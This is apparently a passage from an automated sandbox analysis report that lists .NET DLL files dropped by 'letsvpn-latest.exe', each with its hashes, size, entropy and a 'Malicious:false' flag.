                                                                                                                                                                                                  SHA-256:9DB72960541B2D616BE36E4B93A6A1E175C3BA19FF499F4FA52F65BE9B0A118D
                                                                                                                                                                                                  SHA-512:1B3F9D7CF29B55AE376144642DDACEB4F838D74B4FECC1F43B51ED773011020E6FD3CB2DCC4882CFCFD815873EF36DB8C37F2B3EE4BDEF5C04E32C896354520A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.955751189727143
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:qSKiWIhWghqWOHlLf2KQcvBZ9s4WS+ShjmM6IGBkSavP:qSK8Tq3b2KZBZLWS+ST6nkPn
                                                                                                                                                                                                  MD5:12E1F87B4E4AE9C1B2C0B869C1C245D0
                                                                                                                                                                                                  SHA1:0827BCB962BF1A46FB2FCDFF1650E659E8B571F9
                                                                                                                                                                                                  SHA-256:B150643E26EF1B14B56F2937943E7A33386A8EDEA200219350B65C1998624973
                                                                                                                                                                                                  SHA-512:E7C0D6E031B82F6C11A35587AAD76C3C50E0ABAFD55CADF8A17F79C095B59811B1082FFF18D9C9CD67742627F161D4B7D72A64F542D540F244289761F206DDD8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.896920735077221
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:/0KbZWApWmWTpWmyhqWOHlLf2KQcvBZ9Qr3RS+ShjmM6IGBkSAB0i:sKRylGq3b2KZBZyhS+ST6nkR0i
                                                                                                                                                                                                  MD5:AB085119653ACB754C41844348FE3F5F
                                                                                                                                                                                                  SHA1:0118CBCF925712558061C5E9E271C794B5533B6A
                                                                                                                                                                                                  SHA-256:C02843ABE60064456389B7F9727661DCFE02523B5161A4DA8963B400471961C9
                                                                                                                                                                                                  SHA-512:6A615675953BCC9DB39B77EF4D8E44E3E215A4F986678F997AD17615B4D7CFBE1F2167371DE04E77278129D8C25B6C327E9F928B4F1F329A531F4C52750C8D83
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.972496245661368
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:XLH9W5nOWihqWOHlLf2KQcvBZ9c9TyS+ShjmM6IGBkS9f08:XL4Gq3b2KZBZQyS+ST6nk+f08
                                                                                                                                                                                                  MD5:3C3E85085D12983A32AD6C6A2CA91BBA
                                                                                                                                                                                                  SHA1:378F899018CEB4B24F22BCF0E9BD2AE0324C45CD
                                                                                                                                                                                                  SHA-256:03EFEB3214F6D2811BABD2A6DFCF6B512B0CC9D1E11FFB24ABB88E5866DD4F64
                                                                                                                                                                                                  SHA-512:6CE6250595400D5CDAE6ADCE03E43C8ADDF4AE65F33AE7EDB94094301D5498EF0C9453B00850A8D23A8462E199FCFC10A450D2B4A29F4C10BBC311407ECD4158
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.876963437900696
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:2lbWvX+W2hqWOHlLf2KQcvBZ9mVS+ShjmM6IGBkSD:22iq3b2KZBZaS+ST6nkM
                                                                                                                                                                                                  MD5:A3C1273F2145FB8D93DECB44CE19B403
                                                                                                                                                                                                  SHA1:E9733AFA79116C1BC21C280FD84A98599D43543F
                                                                                                                                                                                                  SHA-256:45D4AC5C94A5CF78D2E4ED795767550407C4E3ED2C9E481E0DBBA71DAF331D41
                                                                                                                                                                                                  SHA-512:259BC3A26D1E20EE16D10E3BAF563B4DC0C24F4525AB786C70FB3DC9EFC7042F9177A24836DDE2A3D5E45715CD2FA7FAC8B97DAA49DE5C33C6E72908C4F19B50
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.89250295264903
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:c2mtX7WWRvWWchqWOHlLf2KQcvBZ9bYD5RkS+ShjmM6IGBkS+fk:c28XdMq3b2KZBZVkkS+ST6nkpfk
                                                                                                                                                                                                  MD5:972D2CD78F6CF7267CB7BB5FB90CEF7E
                                                                                                                                                                                                  SHA1:16FA79E77AD04062E741887F2C20886E08498D51
                                                                                                                                                                                                  SHA-256:81C839BB8194AF5342D84F0CDF0CD30A37AE391B2B0F871C206BD20CA22FDDDA
                                                                                                                                                                                                  SHA-512:C85D368805D0D2C7409A249D4F7253A7CB75C05F2AF8C49479F375C2AEA4F38EDC0FFE0D4D2E9B21AAEAA94A7D4ED8A42C0A121B7BCF74DC3F26CE70879E7ED6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24096
                                                                                                                                                                                                  Entropy (8bit):6.538265849347418
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:p8h2IgODoeNlPSCqWvVEWJlhqWOHlLf2KQcvBZ9S1GS+ShjmM6IGBkSLE:6z1zNlFBvLq3b2KZBZwGS+ST6nkv
                                                                                                                                                                                                  MD5:9C025374184B9455320FA76092C9E5AF
                                                                                                                                                                                                  SHA1:3DA46D5C933E60CFD117B7EA37014D6D79A0C227
                                                                                                                                                                                                  SHA-256:35457DFAD21D597170CDD44BA7B80618CDF15E3D8F30DD417D6AA8A8A06B15C6
                                                                                                                                                                                                  SHA-512:12D92DB376BB8F1F50034855C51D0D9DF8B4483F3F2CD80CF6B18373A53269C020AA36D897AE4FC30563B0299018DB0E1BFAAB16AAA48409C0536B23D5002417
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.920981860705336
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:CLkW1JgWBhqWOHlLf2KQcvBZ9jDU4S+ShjmM6IGBkSlxxl:CVJq3b2KZBZK4S+ST6nkAxl
                                                                                                                                                                                                  MD5:F80FEE9B7D237CC74781BE1FA407C84F
                                                                                                                                                                                                  SHA1:F25C6840EF0A9474A049A4720F18B3F3D35825F4
                                                                                                                                                                                                  SHA-256:945C8142C6DCE8DF9B3CA23EA98D46045051C4FA513329EED22C4B3806A4B4EC
                                                                                                                                                                                                  SHA-512:3ED8D958C78B6452BE1E104E4655B9B8CBF43C6B8DD2E08CD1C75FE4FDCAA950521E9538EFC7316A022AF223B00AD88F4134DEA6B4D22E051D8BFF87C636655C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20000
                                                                                                                                                                                                  Entropy (8bit):6.829709317092374
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:iISW5NW2eWhhqWOHlLf2KQcvBZ9qfAzhaS+ShjmM6IGBkS5M:i+5bPq3b2KZBZB8S+ST6nkF
                                                                                                                                                                                                  MD5:A3AFDF77AF6A68CDEF15B468470622A3
                                                                                                                                                                                                  SHA1:C7F9B758569CF66D77A201B3E9D8F1FDE7640103
                                                                                                                                                                                                  SHA-256:72DAC6728F516A6B909A6CEBE7838D6493F63A3FCDADE001AC32A77D32876C1B
                                                                                                                                                                                                  SHA-512:D453817F6198A302FECD8736CE4C1B3D9CF59BDCE484FDFE91860D8BEB8A8EAA50FF401BCB9D5F7F2EB9E06ED521AD4C22CD7E102C0D2EBB90BD6DCCCAB36467
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22048
                                                                                                                                                                                                  Entropy (8bit):6.804006840038962
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ChO4YkTdk8VKWCWV1upaW4hqWOHlLf2KQcvBZ9eMKQAS+ShjmM6IGBkSe:ChOSQ6q3b2KZBZuQAS+ST6nkR
                                                                                                                                                                                                  MD5:76DAF9C183DCC2B6BC7D4376DE0F21D6
                                                                                                                                                                                                  SHA1:0BEE15FE2B57C824A9A4AD663650A15E74CEA05C
                                                                                                                                                                                                  SHA-256:AE21471D5490904DD73A086B6E59A489230756F9560E07871721B6E5AC7D0F53
                                                                                                                                                                                                  SHA-512:800371B0724081D406A560F44E02D9636E5FF0DA9C32061C388545E2CB92B68576E912C6D90F4176286559F1B8EE11167B270166682BA229843D5356C7DAE80D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):764448
                                                                                                                                                                                                  Entropy (8bit):7.47717615350681
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:SILs7xn7kZQ6kliVreJIHHr0tRYbKr2KtG9VKABC6rPq7:jG9km6k/IwRYbiBeKGCz7
                                                                                                                                                                                                  MD5:8A309D9D04F95D704D1B3B9DE0CB3F40
                                                                                                                                                                                                  SHA1:239B41D00B0E3F694D5E8D44594A69ADD9E40AD6
                                                                                                                                                                                                  SHA-256:4CCB06D83139AFECF2676E354404BCB5B08E813678E88AFBBC416F897A83C4BC
                                                                                                                                                                                                  SHA-512:2C240259B33BD1E38F696F13E6B57C87F9656AF70973C83EF2A3153B3D05033212CF8F87CAF23DCDB71ADE5F4775900EEB27A2606D879CA1E1B79CDDCF2F05A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.977283829370365
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6b1nWCXWThqWOHlLf2KQcvBZ9cWS+ShjmM6IGBkSNzw:E70q3b2KZBZrS+ST6nkN
                                                                                                                                                                                                  MD5:23EBB78F471F77A02CA547D47DAC28E9
                                                                                                                                                                                                  SHA1:46077E24AEF1939A27130CD83B645799685165D2
                                                                                                                                                                                                  SHA-256:647675A1BBB73058745FD67A25DF60FF300FD47421A4806D12A8C1DB5C7521BD
                                                                                                                                                                                                  SHA-512:CEF961FFB116A405B457B12E3FAD689AB80E41160F293631B4B9146F6B4F8A0E15DBDF58DCBCA94638DA6FF97C3FB3359FCE92D3D0FDEEE81FB314C9411780EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.887674507025203
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:W9yW7TWjhqWOHlLf2KQcvBZ9yN4S+ShjmM6IGBkSJTo:ofYq3b2KZBZpS+ST6nkko
                                                                                                                                                                                                  MD5:EE18D84D95C0F1535EA84126F1CEBC56
                                                                                                                                                                                                  SHA1:EFB937BE1FBBB7149F49C3BB3860A511BC789072
                                                                                                                                                                                                  SHA-256:C659E7D9EF2F3E72FF750CDBF5792D327F012782C3F888449546558C352E8925
                                                                                                                                                                                                  SHA-512:1DECAD4D100507A1878C254A83CEDBA000493DF972A4CDB1D955FFA4E1EC31485DAB0AC842F12185E9169A85A86301FCF18D61A175B43C2400B3024C384DACEB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.012009934217988
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:06Rb32WVzWFhqWOHlLf2KQcvBZ9VBcuS+ShjmM6IGBkSvU:DRb3daq3b2KZBZrdS+ST6nkEU
                                                                                                                                                                                                  MD5:87470FF818547DFB3CF7813EB07C9617
                                                                                                                                                                                                  SHA1:555FA45A05C9E803617EA872BE534E65009B3504
                                                                                                                                                                                                  SHA-256:6F6CE08335FA5FA55278C254FCE2D4DC611531AA53F7DE574991BBAD7888F28E
                                                                                                                                                                                                  SHA-512:3E941B496B0635AC719052CC0ED4B2A0B941D30E50261E46D53CEAA3F120970655EACD6DE7C63460CBB9F4B603EEAE9B3EF251C32ACE5668FF37BF4282CEAC93
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32800
                                                                                                                                                                                                  Entropy (8bit):6.421442296570712
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:7MWavA+YHfsZtaOq3b2KZBZcNmS+ST6nk0:7CvA+YEuB3qKD/mC
                                                                                                                                                                                                  MD5:D6DB8C4DD199D5EA11638B21B2DA3516
                                                                                                                                                                                                  SHA1:D1853A51FEF8536FBE2B01BB84053E058FDAED04
                                                                                                                                                                                                  SHA-256:D6A7F97C2E73061FE74C5F890984C8F58653FE68BE3BEEF507F6530DE2896309
                                                                                                                                                                                                  SHA-512:956C15A5FCC5B746D18FABADFE1BFDBF40509BF617C18CF7A4AC47A7739E6FC56F115450871B8C4C5DC999FF9B816241C1E3F49F366358ACABC632C8AEB0AF90
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33312
                                                                                                                                                                                                  Entropy (8bit):6.627433940507071
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:nu5I+sqOylryry8qqIfUc7a5Fq3b2KZBZ1S+ST6nkv7:nYIVBpry8qqIfUcm5A3qKX/mx7
                                                                                                                                                                                                  MD5:500D590818EEB1D5F425F37A29B4DD6F
                                                                                                                                                                                                  SHA1:C97012B1C9E7BB5E1C4DB172828535986B9B5800
                                                                                                                                                                                                  SHA-256:F5B75FE483F7AE77438E8E5158E7ED5BBCD16BA2787AA92FE69596C0205BA836
                                                                                                                                                                                                  SHA-512:BA1C02BAA82BCCB1A391156E0B2070CEF76E4DD3B35C30BB5060C9320574ECE35F11FE19B077E24287B6AC53BFDE59F858D4D64CCA2CEB4AD5F05E2493EF2229
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28704
                                                                                                                                                                                                  Entropy (8bit):6.595812815283715
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:MRZ4nNxnYTb6Blh9q3b2KZBZiiS+ST6nkb:PYTb6vho3qKb/mh
                                                                                                                                                                                                  MD5:8E14D9F0BF87605E6535D68B0FD8C56B
                                                                                                                                                                                                  SHA1:A9D03FC849BEDD0C91A891E26B670A408D446D6E
                                                                                                                                                                                                  SHA-256:C7B3C34060A40BBE58CE03D4B296556B7186D08FE9A99E27D4A15951CF2CF80C
                                                                                                                                                                                                  SHA-512:4178EDB29B147D35A4F826B19EF220FC8EAE704BB3D1354058A41E775CB517B5576D7793C8BD6DA07C986EA2E2464844AF7BC95E3659661901F35BD437649BC5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.97531319551383
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Fvn4HREpWiQWjhqWOHlLf2KQcvBZ9fbS+ShjmM6IGBkSj:qSHq3b2KZBZlS+ST6nkI
                                                                                                                                                                                                  MD5:BB76B6B59F9B91669E4E620BCFBF45E0
                                                                                                                                                                                                  SHA1:4B251EBC28FE4C9257080EFC7B4146F7F2025230
                                                                                                                                                                                                  SHA-256:71E214159B5342A03F6343C4ECA5623C6948455BA2F509720BFDE70D804B35C7
                                                                                                                                                                                                  SHA-512:9255352F3A3FE4A63DC05D191F604E47D7C2681CFAE90CC412937EB9D47ACA79E3C32DD6B491F2FB4E1391A452E7D9C5D3317E63A4C1B6460E532FA96FC488AE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.878055743773289
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:y8MjKb47T3UCcqFMkJ59WdtW0hqWOHlLf2KQcvBZ98imTKS+ShjmM6IGBkSubu:/MjKb4vcGdObq3b2KZBZbCKS+ST6nk7S
                                                                                                                                                                                                  MD5:539E2BD6B494B24A740542D5848CEAD2
                                                                                                                                                                                                  SHA1:C9E763F47309E326958EDF77BCAF6A220B1E69B9
                                                                                                                                                                                                  SHA-256:34D54D62F359CAFFF810A522F654B02BF00C8EC5B0315D37C343673223272DED
                                                                                                                                                                                                  SHA-512:CEB43F8BD718ACACFD52B2BFE7DB3ED043E465E2133B0F86C7582C9FECDB58CD08ECBB1A1F4D975581227E235A785BD9C9F2309857C0C7F6588D3AC71E6E65AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.969645890003852
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:LzyNXd4+BW6FWahqWOHlLf2KQcvBZ9nxdS+ShjmM6IGBkSE0:Czhq3b2KZBZxS+ST6nkA
                                                                                                                                                                                                  MD5:CF6552D68B6F1C55F3C689DD9C0EE2E6
                                                                                                                                                                                                  SHA1:37723E957F45EF8A943BAB49EDAA7EA4F18EEA23
                                                                                                                                                                                                  SHA-256:2CE7C251CE22D21A90E801EE0264778CD292A9271CF50B9FEB8F5762CCD4BF97
                                                                                                                                                                                                  SHA-512:50256B2D874FF70AEB52838EB64E7B8C7DBF3E2D5617EDF3E711648FB65C6E0234AA4660FBFC0AECF598F1E318B42CE57AB1141F1D2A7BC7312EEC52C452B9CF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.96528000837832
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Zvs2Q3HKJNrWWRWOhqWOHlLf2KQcvBZ93d6S+ShjmM6IGBkSzL:ZuM9q3b2KZBZv6S+ST6nkML
                                                                                                                                                                                                  MD5:1592C7E948FF7CDFE8D93D07B285AB46
                                                                                                                                                                                                  SHA1:84A0AFFB12888F576A8367AB3FFE3311CDC0E781
                                                                                                                                                                                                  SHA-256:D39637DA74B212D707EF62FFB5508AA03D33EACB3CE467519C018691178AE9BB
                                                                                                                                                                                                  SHA-512:EB71D470608717A1321CBDDA85484D091BE992FD23983BF2212CA2088FC613F8E13BFAB85F48C7FBA8199508F0E6F2446F6E414A8FDB9D7AB28E180C80FFC3F4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.93954537010736
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:vFz0Q6gcqRhcsMWdMW3hqWOHlLf2KQcvBZ9viS+ShjmM6IGBkSPC:vFz1c67q3b2KZBZIS+ST6nkV
                                                                                                                                                                                                  MD5:15CDE5130A757AE138879A5B76880593
                                                                                                                                                                                                  SHA1:4B29C1BD9B3809A39607A3D972280DFE7CCD07A1
                                                                                                                                                                                                  SHA-256:3469C44E1E8480D20FECD1A45151BB9C7DE737B8F906F28D793838AA04200877
                                                                                                                                                                                                  SHA-512:A4DD3CA58859CFC9FD9690E3145297452EEED596FD7360EB2D863677598726427B7DC5C860EEF56BA8538A204A4C6ACCFDC9ABE8D1FD1323B766EB039FEE70A3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.837689115862053
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:F6xWA3W4aW/NWChqWOHlLf2KQcvBZ96U9HS+ShjmM6IGBkSB:FaBRq3b2KZBZ9JS+ST6nkW
                                                                                                                                                                                                  MD5:22012E4D0DD60A9988E005A03199702F
                                                                                                                                                                                                  SHA1:1EAF9418A32EC551423F8B51946F74A3E1517252
                                                                                                                                                                                                  SHA-256:D3B318DFF6DA0D3646A56C124F1A81A3111CD12730356F8396888F2CF074D61F
                                                                                                                                                                                                  SHA-512:E7FC15AE7FE54013803B242C945D670596B412C98BC8FEFE000110176217B7D7523D5E2424093D138CBA04B7C0937A7E8CB54E963D66E1533283E10259F8D2DB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):74784
                                                                                                                                                                                                  Entropy (8bit):5.993362873950785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:r784YWau8lqubx6WxXLA+o2SLFyEdux136ytgHo0AuresehSAS3qKw/mg:r7NV8v36tI0XCKASM//
                                                                                                                                                                                                  MD5:B858455996C84CB4A2E23E77F5DD2052
                                                                                                                                                                                                  SHA1:E3C301E11B436F05BDD431515EA0AC4EE8F3E621
                                                                                                                                                                                                  SHA-256:56CA971A57FFE258049F47CF0C292BA33FC8206A2B6006391CA9C222BF959AF3
                                                                                                                                                                                                  SHA-512:7E54B175EB40304211EB9C0CAACF1CDF51C2679C940B33AF679165F3EAAA3B1531BC53F9F98FCD431E55DF0CCFE12C464DE0F3783AE13FBC6EF2AA4EC1294442
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18976
                                                                                                                                                                                                  Entropy (8bit):6.822573815542487
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:vvx21MWeLqW5nhqWOHlLf2KQcvBZ9gnHWma4S+ShjmM6IGBkSk:vJ2Wthq3b2KZBZ94S+ST6nk3
                                                                                                                                                                                                  MD5:9016D24A15C0FCABCA9B195685D546D3
                                                                                                                                                                                                  SHA1:3F59CC68BDE25DB5B256DD72608E53F243003027
                                                                                                                                                                                                  SHA-256:C19FA40FC81ADD0E8FA598F03BDEC26B4DBEA3501DF5658E06927CDC6E15FA49
                                                                                                                                                                                                  SHA-512:621081DD9967702E4FE16BAD789DC3D5D3BD725E77C17AEA6BE56D0E4920E647C7D54DA8C1D1FEA56C051D03ECE545781BBD6B8F02473F34261981334D0CCBC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):51744
                                                                                                                                                                                                  Entropy (8bit):6.2708476869450225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:o3wBccZdxuB8mQen6JxKjrlMZgR0Eot3qKY/mN:WcHmQPUktc/C
                                                                                                                                                                                                  MD5:9BD8BABD259D5301A0A1E5050A163BAE
                                                                                                                                                                                                  SHA1:38D666BB5268A260EA6AA38369FB82CC6029F9EA
                                                                                                                                                                                                  SHA-256:57D256764D6E780D505AFA63479A1C2A7A374079D0F93CC57C4967367585ACAE
                                                                                                                                                                                                  SHA-512:38F6FD5C2212C276D3C42C145012C4F3DBD95F7E93A817C8E988343B8B2CEF65A953529BE7313C38C1F0639C617B0E0D9D828B647E0DD0A35DCEF463096ACF4C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.955210507891377
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:3r97WquWYhqWOHlLf2KQcvBZ9A9S+ShjmM6IGBkSiaj:3RJ4q3b2KZBZYS+ST6nk5e
